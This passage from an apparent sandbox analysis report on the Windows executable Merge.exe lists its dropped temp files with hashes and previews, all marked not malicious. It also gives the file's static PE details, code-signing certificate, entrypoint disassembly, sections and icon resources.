                                                                                                  Encrypted:true
                                                                                                  SSDEEP:786432:INKBYjUMojDqpPBm1I+yuCUegHOdUXed9:INKqjMfsZECUhRA9
                                                                                                  MD5:35616EA1167648C4D8A58F90A70E6E97
                                                                                                  SHA1:6A547A8FF546C1409B45B7DCBB2E6EE1F69F96C0
                                                                                                  SHA-256:F107E1DECBF477AA43854A3D6181DFAF10DB30359CB1ABBBF87B2FDFFA2026FB
                                                                                                  SHA-512:D538D90B17F36EA182AE4AEACC7E2FCDAD864A7149DC5D7BA350802757467EA66E2B680C068B33C0B2999CBE79438BF7CDCE7ED063A86D017D67D71AAB9E7107
                                                                                                  Malicious:false
                                                                                                  Preview:7z..'....'Q.{.......%........fV..&..].......lF*n..>.W...W^.....#~.P[.......g..s.b......|....A.......m...fMc..N......$...W.0H3.......,..%.{wxt..[.?M...Y......A.8b....N.+N..'.,S....C..N.....5I...p--DT.t.|%2..0....?...la...L{..|.......'.4..q3...s..F.u.UU....i.......c.l..T-72.;....`#h..M&...@....?a.6ko.d..24..:......u....4.....C.*..........v..@..WD..$8...cV.L]....Jv.[O`m}r..#..]..R.....K}Z...s...j.o......HL.f:..q.Y..{...[...}.....T... ..t...G.;.Q..D......b...HPc....Z7..2U....w-$q.....+.d.`K.Y..A....D.6x.VLU.w... .7Q.6....+..`.3s..R..}.O.x<vi.{....(...a..y.u...iO....(.isq...p..q.xS._..gDv}4.6,....wf\....K.?.\..:.2.....q..Ee.L.PZ......$...GVo$x..\......\.[.S.}.k.^fr..8..........),.);...(.....2U..p..hUd.V.,..:.....a......$.......01.I.....[pM.....g.2K.T....\#.....B.,.I.d.&F.v. ......{;I......Q..{..B.2x#.'".w...Q.-.F..o .L/...LGE[......t...?.x..PC..m'..-..-|1}....../.....,.....C....i..[.3.QO....R..u..~+.O.....0...&.%?..h<v..h.N....!...3.....j..

                                                                                                  C:\Users\user\AppData\Local\Temp\__db.s5sg.4

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:Berkeley DB (Btree, version 9, native byte-order)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16384
                                                                                                  Entropy (8bit):0.030191689390222036
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:0lBCtNl1lV99q9ldlE/l9ltlBttklV99q9ldlE/l:c2V98M91LCV98M
                                                                                                  MD5:18B61C1E21D0040792B000B4903267D7
                                                                                                  SHA1:282D52755D87D4892E2D67821C4AEC5B0BD0E4EB
                                                                                                  SHA-256:DF5CCEC360B2A599BA6FF63A3811A4FA1D8AFE387E91C477C20C7B4869770A03
                                                                                                  SHA-512:5F5836DD9BD222C82DA194A23D9D2D78E156704A398C81E332DA64B0941CD62871F4C2559BF2EE911FC8AF45651B9305C85FF961E799E16D05909F9AFFA9EBBB
                                                                                                  Malicious:false
                                                                                                  Preview:............b1....... ..............................0.......)X./.................... ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\s5j8.0\data.0

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):130
                                                                                                  Entropy (8bit):2.6212307144865425
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:xNIDzk+xlliplltq8QRXe//w:x0zjsplK8Ee//w
                                                                                                  MD5:647E8E57755CF2ADA12589060C50C079
                                                                                                  SHA1:A7DA88301FE4A32AAA36FDC216F743A9FBE557EB
                                                                                                  SHA-256:6E45A40F910A85232E711D528C16B33956A3212CAC414C3B7DDDCCF2856C64EB
                                                                                                  SHA-512:EC0D03B7950D82D58E8F36724D9D072C82ED943DECD82F68AA94134F5A334B32F11726B83B8A1936A84CC8018D8999FC0AE29EF2371CF7F5DACC47BA06C9BC6B
                                                                                                  Malicious:false
                                                                                                  Preview:ADIOS-BP v2.9.2 Data............292.............................[PGI>.......n..Output......1..................................PGI]

                                                                                                  C:\Users\user\AppData\Local\Temp\s5j8.0\md.0

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):134
                                                                                                  Entropy (8bit):2.3816183899920396
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:xNIDiijIxll0lbqQRVQRDshtll:x0iVeGEVnh
                                                                                                  MD5:110090F60E6DA1EBD8C003DD4A8EFE22
                                                                                                  SHA1:DC592E5FB12B34413CBD1FA8BDD6B8DE063B6E3F
                                                                                                  SHA-256:9A74DE2A2AFA6919AFC2F30A0B046D929DBBBE8786E7F70B1C9C42304C9252A9
                                                                                                  SHA-512:8870D0C11A04D1641016EAD4D27FFDF4CA4D0C8EC5A031DE0439EF72AE5D2DE92A8FC62DD9B54C1AA76D5E03D7A36D9939429087FDE7B8271FA3EB22D99F5EB4
                                                                                                  Malicious:false
                                                                                                  Preview:ADIOS-BP v2.9.2 Metadata........292.................................................Outputn......1....@...............................

                                                                                                  C:\Users\user\AppData\Local\Temp\s5j8.0\md.idx

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):128
                                                                                                  Entropy (8bit):2.381368203576206
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:xNIDV7utfWxll0ldll5lnlrlGGll/ll:x0R6eewylt
                                                                                                  MD5:F77D1E71899B17369674A75E9172E092
                                                                                                  SHA1:0FF1BAB32F8B440DB087A93BE1AE1AC637F78E4B
                                                                                                  SHA-256:0258F7989A239BCE0540BFF682FDB9B2A33C21F0627E53D266E4B04FEC4D5D8E
                                                                                                  SHA-512:9E096A37064B6C999B1D830151331A824ED99DFAB4D29402C4A37C6449CB6421338BE699E5ABEFA054C6B5638AE258D8D48A81DC719D9A3E6C2722FBAAD43BB2
                                                                                                  Malicious:false
                                                                                                  Preview:ADIOS-BP v2.9.2 Index Table.....292.............................................@.......n.......z.................^g............

                                                                                                  C:\Users\user\AppData\Local\Temp\s5j8.0\profiling.json

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:JSON data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):395
                                                                                                  Entropy (8bit):4.761438011606809
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:LS+4owxP9Eyv+0gfYXOHPzbigXDaqE3or:6pl2yz+vzWQr
                                                                                                  MD5:81F2221A6F05D6126505A5000DB0516F
                                                                                                  SHA1:9C42485CF0F69DA484F98B4A813AEFD89C2D008F
                                                                                                  SHA-256:5A241BAF7612A922636724FBDF4A93603A2FF6B5057A46D44CFFBAAF90D8B4B4
                                                                                                  SHA-512:AB7434FEF62F43BEEA2C18C4A3CB8398075E2FB1D5A8BDC1288EFAD2EC83703306F87C7A320B948770162EE2DED1C9B1DBD6122CC1519944BB45A101872A05DF
                                                                                                  Malicious:false
                                                                                                  Preview:[.{ "rank": 0, "start": "Sun_Dec_15_07:36:51_2024", "threads": 1, "bytes": 130, "aggregation_mus": 0, "buffering_mus": 204, "memcpy_mus": 0, "minmax_mus": 0, "meta_sort_merge_mus": 133, "mkdir_mus": 683, "transport_0": { "type": "File_fstream", "open_mus": 245, "write_mus": 48, "close_mus": 69696}, "transport_1": { "type": "File_fstream", "open_mus": 211, "write_mus": 28, "close_mus": 0} }.].

                                                                                                  C:\Users\user\AppData\Local\Temp\s5j8.1

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:v:v
                                                                                                  MD5:68B329DA9893E34099C7D8AD5CB9C940
                                                                                                  SHA1:ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC
                                                                                                  SHA-256:01BA4719C80B6FE911B091A7C05124B64EEECE964E09C058EF8F9805DACA546B
                                                                                                  SHA-512:BE688838CA8686E5C90689BF2AB585CEF1137C999B48C70B92F67A5C34DC15697B5D11C982ED6D71BE1E1E7F7B4E0733884AA97C3F7A339A8ED03577CF74BE09
                                                                                                  Malicious:false
                                                                                                  Preview:.

                                                                                                  C:\Users\user\AppData\Local\Temp\s5j8.1.ics

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):34
                                                                                                  Entropy (8bit):4.270567620343947
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:6xyX5DIRsXyvn:6ydIn
                                                                                                  MD5:86EF038CDEC028873992EEEA93BE75AE
                                                                                                  SHA1:DAB84256410FA44617231E030D296650D8AA7802
                                                                                                  SHA-256:271FB734C4FD6BE9DF843DC03B29CB339337FE10A150B7A554D35DDE3B353443
                                                                                                  SHA-512:F1587ACF8BA46682CB2ADF32EDEA11C19DEA32581819CE8E8A37BCA7600BC7FB2BA6FD993E1A25BB85F5843716F6D85ABD902912F80BCD9FD9C0062F39F2BE9B
                                                                                                  Malicious:false
                                                                                                  Preview:..ics_version.2.0.filename.s5j8.1.

                                                                                                  C:\Users\user\AppData\Local\Temp\s5j8.2.ics

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):34
                                                                                                  Entropy (8bit):4.211744090932181
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:6xyX5DIRsXxvn:6ydI8vn
                                                                                                  MD5:BA415CD8B1C7C0857D2165A9D1F766B7
                                                                                                  SHA1:ED198B11022395B83295014B686E7EEA89F3DE4A
                                                                                                  SHA-256:EC1272B50438940DB626E535C4953165A639552C47C50F946BDBEDEC6336B4B9
                                                                                                  SHA-512:88876B798D65CEB0A119894C200CA5A8A2FCEF54D05E120571FA433A4B919FEA09F195E81E67DD7A0BBE0B47469B081B2876ED5D02FC53601438D217EE6DAB24
                                                                                                  Malicious:false
                                                                                                  Preview:..ics_version.2.0.filename.s5j8.2.

                                                                                                  C:\Users\user\AppData\Local\Temp\s5j8.3

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:v:v
                                                                                                  MD5:68B329DA9893E34099C7D8AD5CB9C940
                                                                                                  SHA1:ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC
                                                                                                  SHA-256:01BA4719C80B6FE911B091A7C05124B64EEECE964E09C058EF8F9805DACA546B
                                                                                                  SHA-512:BE688838CA8686E5C90689BF2AB585CEF1137C999B48C70B92F67A5C34DC15697B5D11C982ED6D71BE1E1E7F7B4E0733884AA97C3F7A339A8ED03577CF74BE09
                                                                                                  Malicious:false
                                                                                                  Preview:.

                                                                                                  C:\Users\user\AppData\Local\Temp\s5sg.0

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:v:v
                                                                                                  MD5:68B329DA9893E34099C7D8AD5CB9C940
                                                                                                  SHA1:ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC
                                                                                                  SHA-256:01BA4719C80B6FE911B091A7C05124B64EEECE964E09C058EF8F9805DACA546B
                                                                                                  SHA-512:BE688838CA8686E5C90689BF2AB585CEF1137C999B48C70B92F67A5C34DC15697B5D11C982ED6D71BE1E1E7F7B4E0733884AA97C3F7A339A8ED03577CF74BE09
                                                                                                  Malicious:false
                                                                                                  Preview:.

                                                                                                  C:\Users\user\AppData\Local\Temp\s5sg.1.ics

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):34
                                                                                                  Entropy (8bit):4.17512313511346
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:6xyX5DIRsXxUv:6ydIWUv
                                                                                                  MD5:747BCCDF6C9546D93F87DA2811AEDF3A
                                                                                                  SHA1:6911973C2D3111295B3B4F459115D1B2EC21B872
                                                                                                  SHA-256:BA495058B34316635E61FC28ECD4D40D7F2DE449AA27590EB6F6EE5152E7092C
                                                                                                  SHA-512:0637D56AD04138C350CA105C3C2ABE8A8B2831D9DAE8F29035F56412C1A327747266099912920363C70ECD81473DBA313E1F7AF5678BED968015B64B28A5170E
                                                                                                  Malicious:false
                                                                                                  Preview:..ics_version.2.0.filename.s5sg.1.

                                                                                                  C:\Users\user\AppData\Local\Temp\s5sg.2.ics

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):34
                                                                                                  Entropy (8bit):4.116299605701696
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:6xyX5DIRsXxXv:6ydIW/
                                                                                                  MD5:2C6725D38A636D40485430F5F3813C18
                                                                                                  SHA1:76E3FE349F73F32F9F5CFD92875F8C9F0ED3C341
                                                                                                  SHA-256:6AAD127FBF69B2F85E0E74CC708AC3415B2086EE599F6D22CA120D492FA18BEC
                                                                                                  SHA-512:2B232D51B2DB1D9C53417022DAD2EDBC620BC06B63BCEB99D1A5DC2D03D21299D90B8612B974D54B96D576983670AD762AEA03036A4AA9FB7A8C51A895BBE796
                                                                                                  Malicious:false
                                                                                                  Preview:..ics_version.2.0.filename.s5sg.2.

                                                                                                  C:\Users\user\AppData\Local\Temp\s5sg.3

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):35
                                                                                                  Entropy (8bit):2.258492676514824
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:XVl6EcxvVKM:kp7
                                                                                                  MD5:D880A299052F9E9DFE0A27A82BCB75A9
                                                                                                  SHA1:7A94DB3C9AA1C526F2B09516AECDC647830A7DB9
                                                                                                  SHA-256:08D23E43FF2E59F5AA84828E4C05A3D61AE6E8C7319318EA57F7A2E91A5FEF2B
                                                                                                  SHA-512:DF2B90AF64C031980FFC6B49D2CFB20EDD79FF31030747689100BD4F916798629D526C4AE84F3E1AD1E530D857CB767DA321CA8EC5376E2FEEB679BBA132AFBD
                                                                                                  Malicious:false
                                                                                                  Preview:0 0 0..1 0 0..1 1 1..0 1 0..0 0 1..

                                                                                                  C:\Users\user\AppData\Local\Temp\s5sg.4

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:Berkeley DB (Btree, version 9, native byte-order)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16384
                                                                                                  Entropy (8bit):0.04605058557444765
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:0lBCtNl1lV99q9ldlE/l9ltl76VlelV99q9ldlE/lggPlLB:c2V98M91+P6V98Mge/
                                                                                                  MD5:9097AAD102EDF3B7CE162F4837BCB669
                                                                                                  SHA1:487F5B9AAA71B1AD48731A0B0EC55FD9C9035E2C
                                                                                                  SHA-256:BD236526BD6F03B4947542B71F7A297E09125549C97102E1BDBA9B51B452C173
                                                                                                  SHA-512:B9B82586AF6EA53E13907FF66FC89212042BA159F39D020F52E9FE52EF4B2E88935C5E7DB98E4C54C1627152A809A63A84795298B71E08F823F96884C6B7E821
                                                                                                  Malicious:false
                                                                                                  Preview:............b1....... ..............................0.......)X./.................... ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):7.670508154447709
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:Merge.exe
                                                                                                  File size:44'935'240 bytes
                                                                                                  MD5:d024ff2fc7acb7c172f0ba38a9fbc2c3
                                                                                                  SHA1:fd79908540ba4abf2beeeb7e93705b8bd8c6609f
                                                                                                  SHA256:113290aaa5c0b0793d50de6819f2b2eead5e321e9300d91b9a36d62ba8e5bbc1
                                                                                                  SHA512:a9b8d4404f7e8338b33e218c1ab8fe773beae991b951ebbd574b8e2da991fd17f6d7c41a479b53684a0514a740a2fdeec3ae2cb2a61d5ccbb840415c8bbbc1a9
                                                                                                  SSDEEP:786432:BIOK9MrmgNNKBYjUMojDqpPBm1I+yuCUegHOdUXedH0:W6mgNNKqjMfsZECUhRA
                                                                                                  TLSH:51A70242F74391B1C8460A3400BF9B7666397E19931987F7EBE8393569727C12B3B788
                                                                                                  File Content Preview:MZ......................@...................................X...........!..L.!This program cannot be run in DOS mode....$..........b.f.1.f.1.f.1...0.f.1...03f.1...0.f.1..g1.f.1...0.f.1...0.f.1...0.f.1...0.f.1...0.f.1...0.f.1...0.g.1...0kf.1...0%e.1...0.f.

                                                                                                  File Icon

                                                                                                  Icon Hash:68ccceecce8eac70

                                                                                                  Static PE Info

                                                                                                  General

                                                                                                  Entrypoint:0xccdbca
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:true
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x671810FD [Tue Oct 22 20:54:21 2024 UTC]
                                                                                                  TLS Callbacks:0xccd2d4, 0xccd898
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:6
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:6
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:6
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:88d05b91874a237fa3522e9dd203c2af

                                                                                                  Authenticode Signature

                                                                                                  Signature Valid:true
                                                                                                  Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                                  Signature Validation Error:The operation completed successfully
                                                                                                  Error Number:0
                                                                                                  Not Before, Not After
                                                                                                  • 25/07/2024 15:42:47 25/07/2025 15:42:47
                                                                                                  Subject Chain
                                                                                                  • OID.1.3.6.1.4.1.311.60.2.1.3=GB, OID.2.5.4.15=Private Organization, CN=CYNC LIMITED, SERIALNUMBER=13066343, O=CYNC LIMITED, L=London, C=GB
                                                                                                  Version:3
                                                                                                  Thumbprint MD5:47338D9BA7DFC5FF406A837A70DE906B
                                                                                                  Thumbprint SHA-1:E9007755CFE5643D18618786DE1995914098307F
                                                                                                  Thumbprint SHA-256:4D94172AF32E228957D25D3059686D666875A037B226224C54E7479E1749AD3D
                                                                                                  Serial:0FA27D2553F24DA79D1CC6BD8773EE9A

                                                                                                  Entrypoint Preview

                                                                                                  Instruction
                                                                                                  call 00007F8BF8E5C43Fh
                                                                                                  jmp 00007F8BF8E5B06Fh
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  push edi
                                                                                                  push esi
                                                                                                  push ebx
                                                                                                  xor edi, edi
                                                                                                  mov eax, dword ptr [esp+14h]
                                                                                                  or eax, eax
                                                                                                  jnl 00007F8BF8E5B206h
                                                                                                  inc edi
                                                                                                  mov edx, dword ptr [esp+10h]
                                                                                                  neg eax
                                                                                                  neg edx
                                                                                                  sbb eax, 00000000h
                                                                                                  mov dword ptr [esp+14h], eax
                                                                                                  mov dword ptr [esp+10h], edx
                                                                                                  mov eax, dword ptr [esp+1Ch]
                                                                                                  or eax, eax
                                                                                                  jnl 00007F8BF8E5B206h
                                                                                                  inc edi
                                                                                                  mov edx, dword ptr [esp+18h]
                                                                                                  neg eax
                                                                                                  neg edx
                                                                                                  sbb eax, 00000000h
                                                                                                  mov dword ptr [esp+1Ch], eax
                                                                                                  mov dword ptr [esp+18h], edx
                                                                                                  or eax, eax
                                                                                                  jne 00007F8BF8E5B20Ah
                                                                                                  mov ecx, dword ptr [esp+18h]
                                                                                                  mov eax, dword ptr [esp+14h]
                                                                                                  xor edx, edx
                                                                                                  div ecx
                                                                                                  mov ebx, eax
                                                                                                  mov eax, dword ptr [esp+10h]
                                                                                                  div ecx
                                                                                                  mov edx, ebx
                                                                                                  jmp 00007F8BF8E5B233h
                                                                                                  mov ebx, eax
                                                                                                  mov ecx, dword ptr [esp+18h]
                                                                                                  mov edx, dword ptr [esp+14h]
                                                                                                  mov eax, dword ptr [esp+10h]
                                                                                                  shr ebx, 1
                                                                                                  rcr ecx, 1
                                                                                                  shr edx, 1
                                                                                                  rcr eax, 1
                                                                                                  or ebx, ebx
                                                                                                  jne 00007F8BF8E5B1E6h
                                                                                                  div ecx
                                                                                                  mov esi, eax
                                                                                                  mul dword ptr [esp+1Ch]
                                                                                                  mov ecx, eax
                                                                                                  mov eax, dword ptr [esp+18h]
                                                                                                  mul esi
                                                                                                  add edx, ecx
                                                                                                  jc 00007F8BF8E5B200h
                                                                                                  cmp edx, dword ptr [esp+14h]
                                                                                                  jnbe 00007F8BF8E5B1FAh
                                                                                                  jc 00007F8BF8E5B1F9h
                                                                                                  cmp eax, dword ptr [esp+10h]
                                                                                                  jbe 00007F8BF8E5B1F3h
                                                                                                  dec esi
                                                                                                  xor edx, edx
                                                                                                  mov eax, esi
                                                                                                  dec edi
                                                                                                  jne 00007F8BF8E5B1F9h
                                                                                                  neg edx
                                                                                                  neg eax
                                                                                                  sbb edx, 00000000h
                                                                                                  pop ebx
                                                                                                  pop esi
                                                                                                  pop edi
                                                                                                  retn 0010h
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  mov eax, dword ptr [eax+eax+00h]

                                                                                                  Data Directories

                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xf379b80xb4.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xfd60000x1b4d470.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x2ad82000x2648.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x2b240000x3cefc.reloc
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0xf296800x18.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xf295500x40.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x95c0000x4d0.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                  Sections

                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x10000x95a3b40x95a400ee4112282ba0f3931dd6a58f9150bda1unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .rdata0x95c0000x5dd4620x5dd6008e9edcce3f6589791f8b89521abdbcd2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .data0xf3a0000x9bc3c0x15e0008cc97e1af09264db229d963c2c5de25False0.36489955357142856data5.371531817065629IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .rsrc0xfd60000x1b4d4700x1b4d600339350a034f29b59be964c234ddc250aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .reloc0x2b240000x3cefc0x3d000950aee6a8c9f40dea2c93dae5104b0d3False0.6106397284836066data6.637916634124949IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                  Resources

                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  TYPELIB0xfd67e00x15790dataEnglishGreat Britain0.32288066217937056
                                                                                                  TYPELIB0xfebf700x4954dataEnglishGreat Britain0.35718090773492434
                                                                                                  RT_ICON0xff08c40x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.45426829268292684
                                                                                                  RT_ICON0xff0f2c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.571236559139785
                                                                                                  RT_ICON0xff12140x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6182432432432432
                                                                                                  RT_ICON0xff133c0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.5914179104477612
                                                                                                  RT_ICON0xff21e40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.7924187725631769
                                                                                                  RT_ICON0xff2a8c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.41763005780346824
                                                                                                  RT_ICON0xff2ff40x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishGreat Britain0.31978060182856466
                                                                                                  RT_ICON0x103501c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5412863070539419
                                                                                                  RT_ICON0x10375c40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6583020637898687
                                                                                                  RT_ICON0x103866c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.5310283687943262
                                                                                                  RT_ICON0x1038ad40x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.3121951219512195
                                                                                                  RT_ICON0x103913c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.3790322580645161
                                                                                                  RT_ICON0x10394240x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.5101351351351351
                                                                                                  RT_ICON0x103954c0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.4944029850746269
                                                                                                  RT_ICON0x103a3f40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.4314079422382672
                                                                                                  RT_ICON0x103ac9c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.2897398843930636
                                                                                                  RT_ICON0x103b2040x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishGreat Britain0.14092966831375567
                                                                                                  RT_ICON0x107d22c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.2945020746887967
                                                                                                  RT_ICON0x107f7d40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.25609756097560976
                                                                                                  RT_ICON0x108087c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.3448581560283688
                                                                                                  RT_ICON0x1080ce40x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.3073170731707317
                                                                                                  RT_ICON0x108134c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.385752688172043
                                                                                                  RT_ICON0x10816340x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.5
                                                                                                  RT_ICON0x108175c0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.5173240938166311
                                                                                                  RT_ICON0x10826040x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.4648014440433213
                                                                                                  RT_ICON0x1082eac0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.2897398843930636
